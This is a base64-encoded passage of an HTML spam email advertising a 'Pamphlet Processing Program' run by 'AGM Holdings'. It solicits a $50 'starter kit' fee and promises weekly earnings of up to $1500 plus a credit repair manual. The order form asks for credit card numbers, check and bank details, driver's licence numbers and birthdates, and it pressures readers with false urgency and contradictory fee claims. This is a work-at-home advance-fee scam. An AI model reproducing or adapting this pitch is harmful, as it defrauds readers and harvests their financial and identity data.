 WyBzdWNoIGFzIGZyaWVuZHMgYW5kIGZhbWlseSBdPGJyPg0KICAgICAgYWNjb21wYW5pZWQgd2l0
 aCB0aGlzIHByb2Nlc3NpbmcgZmVlLiZuYnNwOyBGb3IgZWFjaCZuYnNwOzxicj4NCiAgICAgIGFk
 ZGl0aW9uYWwgb3JkZXIsPGZvbnQgY29sb3I9IiNmZjAwMDAiPiA8L2ZvbnQ+PGk+PGZvbnQgY29s
 b3I9IiMwMDAwRkYiPjxiPnN1YnRyYWN0DQogICAgICAkMTA8L2I+PC9mb250PjwvaT4gZnJvbSB5
 b3VyPGJyPg0KICAgICAgb3JkZXIuIEp1c3QgaGF2ZSB0aGVtIHByaW50LCBjb21wbGV0ZSBhbmQg
 RkFYIG9yPGJyPg0KICAgICAgbWFpbCBpbiB0aGUgb3JkZXIgZm9ybSBiZWxvdyAhJm5ic3A7IE1h
 a2Ugc3VyZSB0aGF0IHlvdXI8YnI+DQogICAgICBmcmllbmRzIGFuZCBmYW1pbHkgcHV0IHlvdXIg
 bmFtZSBvbiB0aGUgb3JkZXIgZm9ybTxicj4NCiAgICAgIGFzIHRoZWlyIHJlZmVycmFsLjxicj4N
 CiAgICAgIDxicj4NCiAgICAgIDwvZm9udD48Yj48Zm9udCBjb2xvcj0iIzAwMDBGRiIgZmFjZT0i
 QXJpYWwiPlJlbWVtYmVyLCB5b3UgY2FuIHBheSBieQ0KICAgICAgY3JlZGl0IGNhcmQsIG1vbmV5
 IG9yZGVyLDxicj4NCiAgICAgIGNhc2gsIG9yIGNoZWNrLWJ5LWZheC4mbmJzcDsgRm9yIGZhc3Rl
 c3QgcHJvY2Vzc2luZyw8YnI+DQogICAgICByZW1pdCBwYXltZW50cyB2aWEgb3VyIGNoZWNrLWJ5
 LWZheCBwYXltZW50PGJyPg0KICAgICAgcHJvY2Vzc29yLg0KICAgICAgPC9mb250Pjxmb250IGNv
 bG9yPSIjMDAwMDAwIiBmYWNlPSJBcmlhbCI+PGJyPg0KICAgICAgPC9mb250PjwvYj48Zm9udCBm
 YWNlPSJBcmlhbCI+PGJyPg0KICAgICAgUGxlYXNlIG1ha2Ugc3VyZSB0aGUgb3JkZXIgZm9ybSBp
 cyBjb21wbGV0ZWQgd2l0aDxicj4NCiAgICAgIGFjY3VyYXRlIGluZm9ybWF0aW9uLCBhcyBpbmNv
 cnJlY3QgaW5mb3JtYXRpb24gbWF5PGJyPg0KICAgICAgZ3JlYXRseSBkZWxheSB5b3VyIG9yZGVy
 Ljxicj4NCiAgICAgIDxicj4NCiAgICAgIDwvZm9udD48Yj48Zm9udCBjb2xvcj0iIzAwMDBGRiIg
 ZmFjZT0iQXJpYWwiPi0gVG8gT3JkZXIgVXNpbmcgQ2hlY2stYnktRmF4DQogICAgICAtPGJyPg0K
 ICAgICAgPC9mb250PjwvYj48Zm9udCBmYWNlPSJBcmlhbCI+Rm9yIGZhc3Rlc3QgZGVsaXZlcnks
 IHBsZWFzZSBGQVggdGhlDQogICAgICBjb21wbGV0ZWQ8YnI+DQogICAgICBmb3JtIGFuZCBhIGxl
 Z2libGUgY29weSBvZiB5b3VyIHBlcnNvbmFsIG9yIGJ1c2luZXNzPGJyPg0KICAgICAgY2hlY2sg
 aW4gdGhlIGFtb3VudDwvZm9udD48L2ZvbnQ+PGZvbnQgZmFjZT0iQXJpYWwiPiA8Zm9udCBzaXpl
 PSIyIj5vZg0KICAgICAgJDUwLjAwIHBheWFibGUgdG8gQUdNIGhvbGRpbmdzPGJyPg0KICAgICAg
 PC9mb250Pjxmb250IHNpemU9IjIiPnRvIG91ciBUT0xMLUZSRUUgZmF4IG51bWJlcjwvZm9udD48
 L2ZvbnQ+PGZvbnQgc2l6ZT0iMiI+PGZvbnQgZmFjZT0iQXJpYWwiPiwNCiAgICAgIDg3Ny04Nzkt
 NjUwOS48YnI+DQogICAgICA8YnI+DQogICAgICA8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDAwRkYi
 IGZhY2U9IkFyaWFsIj48Yj4tIFRvIEZheCBZb3VyIE9yZGVyIFVzaW5nDQogICAgICBZb3VyIENy
 ZWRpdCBDYXJkIC08YnI+DQogICAgICA8L2I+PC9mb250Pjxmb250IGZhY2U9IkFyaWFsIj5GQVgg
 dGhlIGNvbXBsZXRlZCBmb3JtIGFuZCB5b3VyIGNvbXBsZXRlDQogICAgICBjcmVkaXQgY2FyZDxi
 cj4NCiAgICAgIGluZm9ybWF0aW9uIGluY2x1ZGluZyB5b3VyIG5hbWUsIGNyZWRpdCBjYXJkIG51
 bWJlciw8YnI+DQogICAgICA8L2ZvbnQ+PGZvbnQgZmFjZT0iQXJpYWwiPmFuZCBleHBpcmF0aW9u
 IGRhdGU8L2ZvbnQ+PC9mb250Pjxmb250IGZhY2U9IkFyaWFsIj4NCiAgICAgIDxmb250IHNpemU9
 IjIiPnRvIDg3Ny04NzktNjUwOS48YnI+DQogICAgICA8YnI+DQogICAgICA8L2ZvbnQ+PC9mb250
 Pjxmb250IHNpemU9IjIiPjxiPjxmb250IGNvbG9yPSIjMDAwMEZGIiBmYWNlPSJBcmlhbCI+LSBG
 b3INCiAgICAgIFBvc3RhbCBNYWlsIE9yZGVycyAtPGJyPg0KICAgICAgPC9mb250PjwvYj48Zm9u
 dCBmYWNlPSJBcmlhbCI+UG9zdGFsIE1haWwgQ2hlY2ssIENyZWRpdCBDYXJkLCBvciBNb25leQ0K
 ICAgICAgT3JkZXJzPGJyPg0KICAgICAgb2YgVVMgJDUwIHRvIHRoZSBhZGRyZXNzIGJlbG93LiAo
 TWFrZSBjaGVja3MgcGF5YWJsZTxicj4NCiAgICAgIHRvIEFHTSBIb2xkaW5nczwvZm9udD48L2Zv
 bnQ+PGZvbnQgZmFjZT0iQXJpYWwiPjwvZm9udD48Zm9udCBzaXplPSIyIj48Zm9udCBmYWNlPSJB
 cmlhbCI+KTwvZm9udD4NCiAgICAgIDxibG9ja3F1b3RlPg0KICAgICAgICA8cD48Zm9udCBmYWNl
 PSJBcmlhbCIgY29sb3I9IiMwMDAwRkYiPjxiPkFHTSBIT0xESU5HUzxicj4NCiAgICAgICAgQVRU
 TjogQS4gTWlsbGVyPGJyPg0KICAgICAgICBQcm9jZXNzaW5nIERlcGFydG1lbnQ8YnI+DQogICAg
 ICAgIFBPIEJPWCAzMjE8YnI+DQogICAgICAgIEhhc3RpbmdzLCBNSSA0OTA1ODwvYj48L2ZvbnQ+
 PC9wPg0KICAgICAgPC9ibG9ja3F1b3RlPg0KICAgICAgPC9mb250Pg0KICAgICAgPHA+PGI+PGZv
 bnQgY29sb3I9IiNGRjAwMDAiIGZhY2U9IkFyaWFsIiBzaXplPSIzIj48dT5QcmludCBiZWxvdyB0
 aGlzIGxpbmUgb25seTwvdT48L2ZvbnQ+PGk+PGZvbnQgY29sb3I9IiNGRjAwMDAiIA0KZmFjZT0i
 QXJpYWwiPg0KICAgICAgPGJyPg0KICAgICAgPC9mb250PjwvaT48L2I+PGZvbnQgc2l6ZT0iMiI+
 PGZvbnQgZmFjZT0iQXJpYWwiPi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
 LS0tLS0tLS0tLS0tLS08YnI+DQogICAgICA8L2ZvbnQ+PC9mb250PjxiPjxpPjxmb250IGZhY2U9
 IkFyaWFsIiBjb2xvcj0iIzAwMDBGRiIgc2l6ZT0iMiI+DQogICAgICBGb3IgbW9yZSBpbmZvcm1h
 dGlvbiwgY2FsbDxicj4NCiAgICAgIHRvbGwgZnJlZSA4NzctODkyLTc1NzA8L2ZvbnQ+PC9pPjwv
 Yj48Zm9udCBmYWNlPSJBcmlhbCI+PGZvbnQgc2l6ZT0iMiI+DQogICAgICA8YnI+DQogICAgICA8
 YnI+DQogICAgICA8YnI+DQogICAgICA8Yj48aT48Zm9udCBjb2xvcj0iIzAwMDBGRiI+PHU+LSBT
 dGFydGVyIEtpdCBSZXF1ZXN0IEZvcm08L3U+PC9mb250PjwvaT4gLTxicj4NCiAgICAgIDwvYj48
 L2ZvbnQ+DQogICAgICA8L2ZvbnQ+PGk+PGZvbnQgZmFjZT0iQXJpYWwiIHNpemU9IjEiPiogRk9S
 TSBBR00tMjIyOiAxNi5GIChVU0UgMjAwMi0yMDAzKSAqPC9mb250PjwvaT48Zm9udCBzaXplPSIy
 Ij48Zm9udCANCmZhY2U9IkFyaWFsIj48YnI+DQogICAgICA8YnI+DQogICAgICBQTEVBU0UgUFJJ
 TlQgQ0xFQVJMWSAtIFByb3ZpZGUgdXMgd2l0aCB0aGUgY29ycmVjdDxicj4NCiAgICAgIE1haWxp
 bmcgQWRkcmVzcyBUbyBTaGlwIFlvdXIgU3RhcnRlcidzIEtpdC48YnI+DQogICAgICA8YnI+DQog
 ICAgICA8YnI+DQogICAgICA8YnI+DQogICAgICA8YnI+DQogICAgICBOYW1lOl9fX19fX19fX19f
 X19fX19fX19fX19fX19fX19fX188YnI+DQogICAgICA8YnI+DQogICAgICA8YnI+DQogICAgICA8
 YnI+DQogICAgICBBZGRyZXNzOl9fX19fX19fX19fX19fX19fX19fIEFwdC4jOl9fX188YnI+DQog
 ICAgICA8YnI+DQogICAgICA8YnI+DQogICAgICA8YnI+DQogICAgICBDaXR5Ol9fX19fX19fX19f
 X19fX19fX19fX19fX19fX19fX19fXzxicj4NCiAgICAgIDxicj4NCiAgICAgIDxicj4NCiAgICAg
 IDxicj4NCiAgICAgIFN0YXRlOl9fX19fX19fX19fX19fXw0KICAgICAgPC9mb250Pjxmb250IGZh
 Y2U9IkFyaWFsIj4gWmlwIGNvZGUgX19fX19fX19fXzxicj4NCiAgICAgIDxicj4NCiAgICAgIDxi
 cj4NCiAgICAgIDxicj4NCiAgICAgIERheSBQaG9uZTooX19fX19fX18pX19fX19fX19fLV9fX19f
 X19fXzxicj4NCiAgICAgIDxicj4NCiAgICAgIDxicj4NCiAgICAgIDxicj4NCiAgICAgIEFsdC4m
 bmJzcDsgUGhvbmU6KF9fX19fX19fKV9fX19fX19fXy1fX19fX19fX188YnI+DQogICAgICA8YnI+
 DQogICAgICA8YnI+DQogICAgICA8YnI+DQogICAgICBCaXJ0aGRhdGU6X19fX19fL19fX19fX18v
 X19fX19fXzxicj4NCiAgICAgIDwvZm9udD48L2ZvbnQ+PGk+PGZvbnQgc2l6ZT0iMSIgZmFjZT0i
 QXJpYWwgTmFycm93Ij5Zb3UgTXVzdCBCZSBBdCBMZWFzdA0KICAgICAgMTggWWVhcnMgT2YgQWdl
 IFRvIFBhcnRpY2lwYXRlPC9mb250PjwvaT48Zm9udCBzaXplPSIyIiBmYWNlPSJBcmlhbCI+PGI+
 PGJyPg0KICAgICAgPGJyPg0KICAgICAgPGJyPg0KICAgICAgPGJyPg0KICAgICAgPC9iPlByaW50
 IEVtYWlsIEFkZHJlc3NfX19fX19fX19fX0BfX19fX18uX19fXzxicj4NCiAgICAgIA0KJm5ic3A7
 Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i
 c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm4NCmJzcDsmbmJz
 cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsNCiAgICAgIDwvZm9udD48Zm9u
 dCBzaXplPSIxIiBmYWNlPSJBcmlhbCBOYXJyb3ciPjxpPlBsZWFzZSBQcmludCBDYXJlZnVsbHk8
 L2k+PC9mb250Pjxmb250IHNpemU9IjIiPjxmb250IGZhY2U9IkFyaWFsIj48YnI+DQogICAgICA8
 YnI+DQogICAgICA8YnI+DQogICAgICA8YnI+DQogICAgICBWZXJpZnkgRW1haWwgQWRkcmVzc19f
 X19fX19fX19AX19fX19fLl9fX19fPGJyPg0KICAgICAgPC9mb250PjwvZm9udD48Zm9udCBzaXpl
 PSIyIj48Zm9udCANCmZhY2U9IkFyaWFsIj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm
 bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDsmbg0KYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNw
 OyZuYnNwOyZuYnNwOw0KICAgICAgPC9mb250PjwvZm9udD48Zm9udCBzaXplPSIxIiBmYWNlPSJB
 cmlhbCBOYXJyb3ciPjxpPlBsZWFzZSBQcmludCBDYXJlZnVsbHk8L2k+PC9mb250Pjxmb250IHNp
 emU9IjIiPjxmb250IA0KZmFjZT0iQXJpYWwiPjxicj4NCiAgICAgIDxicj4NCiAgICAgIDxicj4N
 CiAgICAgIDxicj4NCiAgICAgIFNJR05BVFVSRV9fX19fX19fX19fX19fX19fX19fX19fX19fX19f
 X19fXzxicj4NCiAgICAgIA0KPC9mb250PjwvZm9udD4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm
 bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDsmbmJzcDsmDQpuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOw0KICAgICAgPGk+
 PGZvbnQgZmFjZT0iQXJpYWwiIHNpemU9IjEiPlJlcXVpcmVkIGZvciBBTEwgb3JkZXJzPC9mb250
 PjwvaT48Zm9udCBzaXplPSIyIj48Zm9udCBmYWNlPSJBcmlhbCI+PGJyPg0KICAgICAgPGJyPg0K
 ICAgICAgPGJyPg0KICAgICAgPGJyPg0KICAgICAgPC9mb250Pjxmb250IGZhY2U9IkFyaWFsIj5U
 b2RheSdzIERhdGUgX19fX18vX19fX18vX19fX188L2ZvbnQ+PGZvbnQgZmFjZT0iQXJpYWwiPjxi
 cj4NCiAgICAgIDxicj4NCiAgICAgIDxicj4NCiAgICAgIDxicj4NCiAgICAgIENoZWNrIE9yZGVy
 czxicj4NCiAgICAgIDxicj4NCiAgICAgIFlvdSBtdXN0IGF0dGFjaCBhIGxlZ2libGUgY29weSBv
 ZiB5b3VyPGJyPg0KICAgICAgcGVyc29uYWwgb3IgYnVzaW5lc3MgY2hlY2sgJmFtcDsgY29tcGxl
 dGU8YnI+DQogICAgICB0aGUgc2VjdGlvbiBiZWxvdy48YnI+DQogICAgICA8YnI+DQogICAgICA8
 YnI+DQogICAgICA8L2ZvbnQ+PGZvbnQgZmFjZT0iQXJpYWwiPkFMTCBOVU1CRVJTIE9GIENIRUNL
 X19fX19fX19fX19fX19fX19fX19fX19fX19fPGJyPg0KICAgICAgPGJyPg0KICAgICAgPGJyPg0K
 ICAgICAgUGxlYXNlIHByaW50IGFsbCBudW1iZXJzIGF0IGNoZWNrIGJvdHRvbSBmcm9tPGJyPg0K
 ICAgICAgbGVmdCB0byByaWdodC4gRXhjbHVkZSBzeW1ib2xzIGFuZCBzcGFjZXMgYW5kIGJlPGJy
 Pg0KICAgICAgc3VyZSB0byBlbmNsb3NlIGNoZWNrIHdpdGggRkFYIG9yIHBvc3RhbCBvcmRlcnMu
 PGJyPg0KICAgICAgQ2hlY2tzIG11c3QgYmUgc2lnbmVkLCBtYWRlIHBheWFibGUgZm9yIFVTICQ1
 MC4wMDxicj4NCiAgICAgIHRvIEFHTSBIb2xkaW5ncywgYW5kIGJlIGRyYXduIG9uIGEgVVMgQmFu
 ay48YnI+DQogICAgICA8YnI+DQogICAgICA8YnI+DQogICAgICBDSEVDSyBOVU1CRVJfX19fX19f
 X19fIFNUQVRFIEQvTCAjX19fX19fX19fX19fX188YnI+DQogICAgICA8YnI+DQogICAgICA8YnI+
 DQogICAgICBJbml0aWFsIFRoZSBBZ3JlZW1lbnQgQmVsb3c8YnI+DQogICAgICA8YnI+DQogICAg
 ICA8YnI+DQogICAgICBZb3UgbXVzdCBpbml0aWFsIGJlbG93IHRvIHRha2UgYWR2YW50YWdlIG9m
 IHRoaXM8YnI+DQogICAgICBpbmNyZWRpYmxlIG1vbmV5LW1ha2luZyBvcHBvcnR1bml0eS4gWW91
 ciBpbml0aWFsczxicj4NCiAgICAgIGNvbnN0aXR1dGUgYWNjZXB0YW5jZSBvZiBvdXIgYWdyZWVt
 ZW50IGFuZCBpcyBvdXI8YnI+DQogICAgICB3YXkgb2YgcHJvdGVjdGluZyB5b3VyIGludGVyZXN0
 Ljxicj4NCiAgICAgIDxicj4NCiAgICAgIF9fX19fX19fXzxiPjxpPjxmb250IGNvbG9yPSIjMDAw
 MEZGIj5ZRVM8L2ZvbnQ+PC9pPjwvYj4sIEkgd291bGQgbGlrZSB0aGUgb3Bwb3J0dW5pdHkgdG8g
 ZWFybjxicj4NCiAgICAgIGV4dHJhIG1vbmV5IHdvcmtpbmcgcmlnaHQgZnJvbSB0aGUgY29tZm9y
 dCBvZiBteTxicj4NCiAgICAgIGhvbWUgb3IgYXBhcnRtZW50IHBhcnRpY2lwYXRpbmcgaW4gdGhl
 IFBhbXBobGV0PGJyPg0KICAgICAgUHJvY2Vzc2luZyBQcm9ncmFtLjxicj4NCiAgICAgIDxicj4N
 CiAgICAgIF9fX19fX19fXzxiPjxpPjxmb250IGNvbG9yPSIjMDAwMEZGIj5ZRVM8L2ZvbnQ+PC9p
 PjwvYj4sIEkgdW5kZXJzdGFuZCB0aGF0IG15IHN0YXJ0ZXIncyBraXQ8YnI+DQogICAgICB3aWxs
 IGNvbnRhaW4gdGhlIGluc3RydWN0aW9ucyBuZWNlc3NhcnkgdG8gZ2V0IG1lPGJyPg0KICAgICAg
 c3RhcnRlZCBJTU1FRElBVEVMWSBhcyBhIG1lbWJlciBvZiB0aGUgUGFtcGhsZXQ8YnI+DQogICAg
 ICBQcm9jZXNzaW5nIFByb2dyYW0gITxicj4NCiAgICAgIDxicj4NCiAgICAgIF9fX19fX19fXzxi
 PjxpPjxmb250IGNvbG9yPSIjMDAwMEZGIj5ZRVM8L2ZvbnQ+PC9pPjwvYj4sIEkgYWxzbyB1bmRl
 cnN0YW5kIHRoYXQgbXkgU3RhcnRlcidzPGJyPg0KICAgICAgS2l0IHdpbGwgY29udGFpbiBteSB2
 ZXJ5IG93biBjb3B5IG9mIHRoZSBDUkVESVQ8YnI+DQogICAgICBSRVBBSVIgTUFOVUFMITxicj4N
 CiAgICAgIDxicj4NCiAgICAgIF9fX19fX19fXzxiPjxpPjxmb250IGNvbG9yPSIjMDAwMEZGIj5Z
 RVM8L2ZvbnQ+PC9pPjwvYj4sIEkgdW5kZXJzdGFuZCB0aGF0IEkgY2FuIHVzZSB0aGU8YnI+DQog
 ICAgICBDUkVESVQgUkVQQUlSIE1BTlVBTCB0byBsZWdhbGx5IGNsZWFyIHVwPGJyPg0KICAgICAg
 YW5kIHJlcGFpciBhbnkgbmVnYXRpdmUgY3JlZGl0IHRoYXQgSSBtaWdodCBoYXZlITxicj4NCiAg
 ICAgIDxicj4NCiAgICAgIF9fX19fX19fXzxiPjxpPjxmb250IGNvbG9yPSIjMDAwMEZGIj5ZRVM8
 L2ZvbnQ+PC9pPjwvYj4sIEkgdW5kZXJzdGFuZCB0aGF0IHRoaXMgbWF0ZXJpYWwgaXM8YnI+DQog
 ICAgICBwcm92aWRlZCB0byBtZSBmb3I8L2ZvbnQ+PC9mb250PiA8Zm9udCBzaXplPSIyIj48Zm9u
 dCBmYWNlPSJBcmlhbCI+YmVjb21pbmcNCiAgICAgIGEgbWVtYmVyIG9mIHRoZTxicj4NCiAgICAg
 IFBhbXBobGV0IFByb2Nlc3NpbmcgUHJvZ3JhbSE8YnI+DQogICAgICA8YnI+DQogICAgICBfX19f
 X19fX188Yj48aT48Zm9udCBjb2xvcj0iIzAwMDBGRiI+WUVTPC9mb250PjwvaT48L2I+LCBJIGFs
 c28gdW5kZXJzdGFuZCB0aGF0IEkgd2lsbCBiZTxicj4NCiAgICAgIGZyZWUgdG8gc2V0IG15IG93
 biBob3VycyBhbmQgcGFydGljaXBhdGUgaW4gdGhlPGJyPg0KICAgICAgcHJvZ3JhbSBlaXRoZXIg
 cGFydC10aW1lIG9yIEZ1bGwtIHRpbWUuPGJyPg0KICAgICAgPGJyPg0KICAgICAgX19fX19fX19f
 PGI+PGk+PGZvbnQgY29sb3I9IiMwMDAwRkYiPllFUzwvZm9udD48L2k+PC9iPiwgSSBkbyB1bmRl
 cnN0YW5kIHRoYXQgYSBzbWFsbDxicj4NCiAgICAgIHJlZnVuZGFibGUgZmVlIG9mICQ0NSArICQ1
 IHMmYW1wO2ggYW5kIHRoaXMgZmVlIGlzIGE8YnI+DQogICAgICBPTkUtVElNRSBGRUUgT05MWSAh
 PGJyPg0KICAgICAgPGJyPg0KICAgICAgX19fX19fX19fPGI+PGk+PGZvbnQgY29sb3I9IiMwMDAw
 RkYiPllFUzwvZm9udD48L2k+PC9iPiwgSSB3aWxsIG5vdCBoYXZlIHRvIHBheSBBR00gSG9sZGlu
 Z3M8YnI+DQogICAgICBhbnkgb3RoZXIgZmVlcywgRVZFUiE8YnI+DQogICAgICA8YnI+DQogICAg
 ICBfX19fX19fX188Yj48aT48Zm9udCBjb2xvcj0iIzAwMDBGRiI+WUVTPC9mb250PjwvaT48L2I+
 LCBJTVBPUlRBTlQ6IFNpbmNlIHdlIERPIE5PVCB3YW50IHRvPGJyPg0KICAgICAgY3JlYXRlIGFu
 eSB1bm5lY2Vzc2FyeSBjb21wZXRpdGlvbiBiZXR3ZWVuIG91cjxicj4NCiAgICAgIGV4aXN0aW5n
 IG1lbWJlcnMsIHdlIGRvIHJlc2VydmUgdGhlIHJpZ2h0IHRvIHN0b3A8YnI+DQogICAgICBhY2Nl
 cHRpbmcgbmV3IG1lbWJlcnMgaWYgb3VyIHF1b3RhIGlzIG1ldC48YnI+DQogICAgICA8YnI+DQog
 ICAgICBUaGVyZWZvcmUsIGlmIHlvdSBhcmUgc2VyaW91cyBhYm91dCB0aGlzIGluY29tZTxicj4N
 CiAgICAgIG9wcG9ydHVuaXR5IHdlIGRvIHN1Z2dlc3QgdGhhdCB5b3Ugc2VuZCBpbiB5b3U8YnI+
 DQogICAgICBjb21wbGV0ZWQgZm9ybSBJTU1FRElBVEVMWSB0aGF0IHdpbGwgR1VBUkFOVEVFIHRo
 ZTxicj4NCiAgICAgIGRlbGl2ZXJ5IG9mIHlvdXIgU3RhcnRlciBLaXQgITxicj4NCiAgICAgIDxi
 cj4NCiAgICAgIDxiPjxpPjxmb250IGNvbG9yPSIjMDAwMEZGIj5ERVNJUkVEIFdFRUtMWSBJTkNP
 TUU8L2ZvbnQ+PC9pPjwvYj48aT4gKGNpcmNsZSBvbmUpPC9pPjxicj4NCiAgICAgIDxicj4NCiAg
 ICAgICQxMDAgJDMwMCAkNTAwICQ3MDA8YnI+DQogICAgICA8YnI+DQogICAgICAkODAwICQ5MDAg
 JDEwMDAgJDExMDA8YnI+DQogICAgICA8YnI+DQogICAgICAkMTIwMCAkMTMwMCAkMTQwMCAkMTUw
 MDxicj4NCiAgICAgIDxicj4NCiAgICAgIElNUE9SVEFOVDxicj4NCiAgICAgIDxicj4NCiAgICAg
 ICQ1MC4wMCBJUyBFTkNMT1NFRDxicj4NCiAgICAgIDxicj4NCiAgICAgIFskNDUgKyAkNSBQb3N0
 YWdlICZhbXA7IEhhbmRsaW5nXTxicj4NCiAgICAgIDxicj4NCiAgICAgIE1vbmV5IE9yZGVycyBB
 bmQgQ2hlY2tzIE11c3QgQmUgUGF5YWJsZSBUbzo8YnI+DQogICAgICBBR00gSE9MRElOR1M8YnI+
 DQogICAgICA8L2ZvbnQ+PGJyPg0KICAgICAgPGZvbnQgZmFjZT0iQXJpYWwiPklNUE9SVEFOVDo8
 YnI+DQogICAgICA8L2ZvbnQ+PGI+PGZvbnQgY29sb3I9IiNmZjAwMDAiIGZhY2U9IkFyaWFsIj5G
 QVggT1JERVJTIFBST0NFU1NFRA0KICAgICAgSU1NRURJQVRFTFkgVVBPTiBSRUNFSVBULjwvZm9u
 dD48L2I+PGZvbnQgZmFjZT0iQXJpYWwiPiZuYnNwOzxicj4NCiAgICAgIDwvZm9udD48Zm9udCBm
 YWNlPSJBcmlhbCI+PGJyPg0KICAgICAgQXR0YWNoIEEgQ29weSBPZiBZb3VyIFBlcnNvbmFsIEFu
 ZCBCdXNpbmVzczxicj4NCiAgICAgIENoZWNrIE9yIENvbXBsZXRlIFRoZSBDcmVkaXQgQ2FyZCBJ
 bmZvcm1hdGlvbjxicj4NCiAgICAgIFJlcXVpcmVkIEFib3ZlLjxicj4NCiAgICAgIDxicj4NCiAg
 ICAgIEFMTCBGQVggT1JERVJTIFBMQUNFRCBBTExPVyBPTkxZIDc8YnI+DQogICAgICBCVVNJTkVT
 UyBEQVlTIERFTElWRVJZIFRJTUUuPGJyPg0KICAgICAgUE9TVEFMIE1BSUwgUGxlYXNlIGFsbG93
 IDIgd2Vla3MgcHJvY2Vzc2luZyB0aW1lPGJyPg0KICAgICAgZm9yIG9yZGVycyBwbGFjZWQgd2l0
 aCBjaGVja3MuIE9yZGVycyBwbGFjZWQgYnk8YnI+DQogICAgICBtb25leSBvcmRlciBvciBjYXNo
 IGFsbG93IDE0IGJ1c2luZXNzIGRheXM8YnI+DQogICAgICBkZWxpdmVyeSB0aW1lLjxicj4NCiAg
 ICAgIDxicj4NCiAgICAgIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTxicj4N
 CiAgICAgIDxicj4NCiAgICAgIFdoZXJlIGRpZCB5b3Ugc2VlIG91ciBjb21wYW55IGFkdmVydGlz
 ZW1lbnQ/PGJyPg0KICAgICAgPGJyPg0KICAgICAgTkVXU1BBUEVSX19fX19fXyBSRUNZQ0xFUl9f
 X19fX18gTUFJTF9fX19fXzxicj4NCiAgICAgIDxicj4NCiAgICAgIEVNQUlMX19fX19fXyBPVEhF
 Ul9fX19fX188YnI+DQogICAgICA8YnI+DQogICAgICBJbnRlcm5hbCBVc2U6IFJFRiBDT0RFIDog
 UmFoLTE1LWluYzxicj4NCiAgICAgIDxicj4NCiAgICAgIExlZ2FsIEluZm9ybWF0aW9uPGJyPg0K
 ICAgICAgPGJyPg0KICAgICAgWW91IGhhdmUgYmVlbiBzZW50IHRoaXMgZW1haWwgYmVjYXVzZSB5
 b3Ugb3I8L2ZvbnQ+PC9mb250Pjxicj4NCiAgICAgIDxmb250IHNpemU9IjIiIGZhY2U9IkFyaWFs
 Ij5zb21lb25lIGFjdGluZyBhcyB5b3Ugb3IgeW91ciBhdXRob3JpemVkIGFnZW50PGJyPg0KICAg
 ICAgaGFzIGFkZGVkIHlvdXIgZW1haWwgYWRkcmVzcyB0byBvdXIgb3B0LWluIG1haWxpbmc8YnI+
 DQogICAgICA8L2ZvbnQ+PGZvbnQgc2l6ZT0iMiI+PGZvbnQgZmFjZT0iQXJpYWwiPmxpc3QuIEZ1
 cnRoZXIgdHJhbnNtaXNzaW9ucyB0bw0KICAgICAgeW91IGJ5IHRoZSBzZW5kZXIgb2Y8YnI+DQog
 ICAgICB0aGlzIGVtYWlsIG1heSBiZSBzdG9wcGVkIGF0IG5vIGNvc3QgdG8geW91IGJ5PGJyPg0K
 ICAgICAgc2VuZGluZyBhIHJlcGx5IHRvIHRoaXMgZW1haWwgYWRkcmVzcyB3aXRoIHRoZTxicj4N
 CiAgICAgIHdvcmQgcmVtb3ZlIGluIHRoZSBzdWJqZWN0IGxpbmUuPGJyPg0KICAgICAgPGJyPg0K
 ICAgICAgPGJyPg0KICAgICAgPC9mb250PjxiPjxmb250IGNvbG9yPSIjZmYwMDAwIiBmYWNlPSJB
 cmlhbCI+RkFYIFRvbGwgRnJlZTogODc3LTg3OS02NTA5PGJyPg0KICAgICAgPC9mb250PjwvYj48
 Zm9udCBmYWNlPSJBcmlhbCI+QmUgc3VyZSB0byBlbmNsb3NlIGEgbGVnaWJsZSBjb3B5IG9mIHlv
 dXINCiAgICAgIHBlcnNvbmFsPGJyPg0KICAgICAgb3IgYnVzaW5lc3MgY2hlY2sgZm9yIGZhc3Rl
 c3Qgc2VydmljZS4gQ3JlZGl0IGNhcmQ8YnI+DQogICAgICBvcmRlcnMgcGxlYXNlIGNvbXBsZXRl
 IHRoZSBpbmZvcm1hdGlvbiByZXF1aXJlZDxicj4NCiAgICAgIGFib3ZlLCBvciBsZWdpYmx5IHBo
 b3RvY29weSB5b3VyIGNyZWRpdCBjYXJkPGJyPg0KICAgICAgc2lnbmF0dXJlIGFyZWEgYW5kIGVu
 Y2xvc2Ugd2l0aCBGQVguPGJyPg0KICAgICAgPGJyPg0KICAgICAgPGJyPg0KICAgICAgPC9mb250
 Pjxmb250IGZhY2U9IkFyaWFsIj4tLS0tLS0tLS0tLS0mZ3Q7Q0hFQ0tMSVNUPC9mb250PjwvcD4N
 CiAgICAgIDxwPjxmb250IGZhY2U9IkFyaWFsIj5QbGVhc2UgZW5zdXJlIHlvdSBoYXZlIGRvbmUg
 YWxsIG9mIHRoZSBmb2xsb3dpbmc8YnI+DQogICAgICB0byBlbnN1cmUgZmFzdGVzdCBwcm9jZXNz
 aW5nIGFuZCB0byBhdm9pZCB0aW1lbHk8YnI+DQogICAgICBkZWxheXMuPGJyPg0KICAgICAgPGJy
 Pg0KICAgICAgPC9mb250Pjxmb250IGZhY2U9IkFyaWFsIj4mbmJzcDs8L2ZvbnQ+PC9wPg0KICAg
 ICAgPGZvbnQgc2l6ZT0iNCI+DQogICAgICA8b2w+DQogICAgICAgIDxsaT48Zm9udCBmYWNlPSJB
